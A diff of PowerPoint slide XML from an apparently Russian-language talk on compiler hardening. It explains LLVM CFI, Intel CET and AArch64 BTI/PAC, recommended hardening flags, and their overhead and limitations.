+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Проверяет совпадения статического и динамического прототипа при вызове функции по указателю</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Поддерживаются vtables и обычные указатели на функции</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>a</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>лгоритмы проверки для них сильно различаются)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Также может использоваться для доп. проверок (корректность C++ кастов и пр.)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Опции для очистки секретов (паролей, ключей</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, etc.):</a:t>
+              <a:t>Реализована только в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не поддержана в GCC</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>S</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>tack scrubbing – очистка</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>стека при выходе из функции (-fstrub)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Очистка регистров при выходе из функции </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>-fzero-call-used-regs</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Опции для защиты от аппаратных атак </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Spectre</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, etc.)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>fhardened</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>– зонтичная</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>опция для наиболее важных </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardened-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>оптимизаций</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включает все опции, рекомендованные </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>OpenSSF</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Compiler Options Hardening Guide for C and C++</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Хороший дефолтный флаг, но пока реализован только в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>LLVM #122687</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Конкретный набор зависит от версии компилятора</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>можно посмотреть функцию `</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>print_help_hardened</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>На 2025 год</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>D_FORTIFY_SOURCE=3 -D_GLIBCXX_ASSERTIONS -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ftrivial</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>-auto-var-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>init</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>=zero -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>fPIE</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Wl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>,-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>z,now</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Wl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>,-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>z,relro</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>-protector-strong -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>-clash-protection -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>fcf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>-protection=full</a:t>
-            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2970358473"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="807350514"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -23426,7 +24095,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC7532A-964A-431E-A4F5-80DD903BB997}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15233ACB-E625-460F-9192-B68DF11CD80D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -23443,8 +24112,20 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>TODO</a:t>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Аппаратные методы</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: Intel CET </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>AArch64 CFI</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -23454,7 +24135,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C484971-452F-45F6-AD84-582487E77763}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CB32CE3-DD1C-42E6-AFBD-3C29F44CB6E0}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -23474,75 +24155,15 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Информация о замерах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в приложении</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Какие проверялись версии дистрибутивов</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как считались </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CVE, KEV</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (скрипты</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Ссылки на примеры</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (Stack Clashing)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как искать проблемные программы (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>no-pie, etc.)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как запустить бенчмарки </a:t>
+              <a:t>Поддержаны в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -23552,56 +24173,78 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Отдельный слайд про </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Rust</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (таблица со сравнением)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Отдельный слайд с рекомендуемыми ссылками</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Слайд с рекомендациями</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверить дефолтные опции в дистро, решить с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Security Team </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>какие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardening</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>-методы включить в проде</a:t>
+              <a:t>Более грубые проверки чем </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LLVM CFI</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Intel IBT </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>AArch64 BTI:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Все места, на которые может быть косвенный переход (бранч/вызов/возврат</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>), </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>помечаются инструкцией-хинтом </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>ENDBR64</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>AArch64 PAC:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Pointer Authentication</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Верхние биты адреса возврата используются для вычисления криптостойкой чексуммы</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Адрес возврата + адрес фрейма + секрет процесса</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Чексумма проверяется перед возвратом</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -23610,7 +24253,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4165890631"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4268116841"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -23642,7 +24285,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3C8DD7-2659-4877-AB44-B521617A7883}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BE66739-220D-4063-A90E-B4ABB2C41F03}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -23660,7 +24303,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Спасибо за внимание</a:t>
+              <a:t>Недостатки</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -23671,7 +24314,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A014712-4ABE-498A-9B77-26D4F051DB7C}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D81B9927-05B7-49F1-9A4E-BB2CA8FF62E5}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -23684,24 +24327,982 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Вопросы</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> ?</a:t>
-            </a:r>
+              <a:t>Оверхед</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Компиляция </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CGBuiltin.cpp </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>компилятором </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>нет изменений при </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Intel CET,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> 6% </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LLVM CFI</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Менее 1</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Chrome: Control Flow Integrity</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>),</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> но 10% увеличение кода </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(I$, BTB)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Нет оверхеда на Android при </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LLVM CFI (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Android: Security: Control flow integrity</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Фрагментация: три несвязанных решения с разными, GCC не поддерживает LLVM CFI</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>F</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>alse positives:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Большое количество софта надо дорабатывать для LLVM CFI (всевозможные </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>reinterpret_cast</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>&lt;void *&gt;</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, etc.)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Например Clang не проходит проверки без фильтров</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>F</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>alse negatives:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>LLVM CFI:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Только несоответствия на уровне типов (хакер может вызвать неправильную функцию если типы совпадают)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Тяжелая интеграция (требует </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LTO, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>проблемы с проверкой вызовов между границами </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>DSO)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Intel/AArch64</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>: вообще не проверяет типы</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не проверяются jump tables, сгенерированные для `switch`-конструкций (только в CET есть `-mcet-switch`, дефолтно выключен)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836139563"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2271678757"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide77.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB30E6FA-DA1C-4347-B182-90992B279AE4}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45889411-7A90-4798-9542-F6772CCFFD20}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
